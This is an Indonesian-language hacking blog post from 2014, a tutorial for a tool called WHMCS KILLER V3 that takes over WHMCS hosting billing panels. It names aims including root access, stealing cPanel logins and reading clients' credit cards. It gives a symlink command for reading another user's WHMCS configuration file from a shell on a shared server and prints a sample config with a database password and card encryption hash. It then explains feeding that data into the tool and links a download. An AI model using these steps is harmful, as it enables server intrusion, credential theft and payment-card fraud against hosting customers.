Friday, March 28, 2014

CRACKING CPANEL DENGAN WHMCS KILLER V3.php

0 comments
 WHMCS KILLER V3.php
Udah ada yang pernah denger whmcs? atau whmpanel?
nah di tutorial kali ini, gw mo share cara menggunakan tools WHMCS KILLER
.
apa gunanya?
1. kita bisa login as admin dalam sebuah hosting dan bisa melakukan apa saja sesuka kita, contoh web target ada disana, nah kita tinggal edit cpanel lewat whmcs yang udah kita, bacaaa "HECK" =))
2. kita bisa dapat root cuma"
3. kita bisa dapet cpanel semau kita
4. crack VPS/SERVER
5. Carding / Read clients credit card
6. dll.
.
nah pertama lu kudu punya target whmcs yg ada 1 server dengan shell kalian.
nah biasanya di web tsb, ada tempat login client/admin
biasanya nama tmpat loginnya
/clientarea, /manage, /client /developer /billing /billingclient /bill

kita kudu dapetin config whmcs tsb dengan cara apapun, contoh dengan:
1. Symlink : praktekan command ini "
ln -s/home/user/public_html/folderclient/configuration.php
2. Root server: dengan menggunakan exploit yg bisa anda temukan di google =)) lalu baca file config whmcs
3. Jumping : tapi kayanya kemungkinan 10% cz dir yg mo di read dari group laen chmodnya beda"

.
Nah klo kita udah dapet file config, ini contoh salah satu file cofig whmcs:
------------------------------------------------------------------------------------
<?php
if(isset($_GET['licensedebug']))
{
unset($_GET['licensedebug']);
exit('Access Denied');
}
if(isset($_GET['forceremote']))
{
unset($_GET['forceremote']);
exit('Access Denied');
}
if(isset($_GET['revokelocal']))
{
unset($_GET['revokelocal']);
exit('Access Denied');
}
$license = 'Leased-d8fbbd343a2408bf7d09';
$db_host = 'localhost';
$db_username = '*****************';
$db_password = 'xS%564Ukea}|';
$db_name = '************';
$cc_encryption_hash = 'MM3hLAb9wDEUovvbwy9SSC0ElML4HfOkSHst7utuXYebjAdGYdoGFfbQRMKpSozA';
$templates_compiledir = '/home/myaccoun/whmcs_secured_folders/templates_c/';
$attachments_dir = '/home/myaccoun/whmcs_secured_folders/attachments/';
$downloads_dir = '/home/myaccoun/whmcs_secured_folders/downloads/';
$customadminpath = '__admx';
?>

-----------------------------------------------------------------------

nah klo udah dapet kaya begituan, kita masukin ke WHMCS KILLER.
isikan identitas target dengan sempurna lalu klik submit....
dari situ ada menu" yg mudah dimengerti, mulai dari edit pass admin/client sampe read password cPANEL :D

download tool:whmc killer v3
download here

Leave a Reply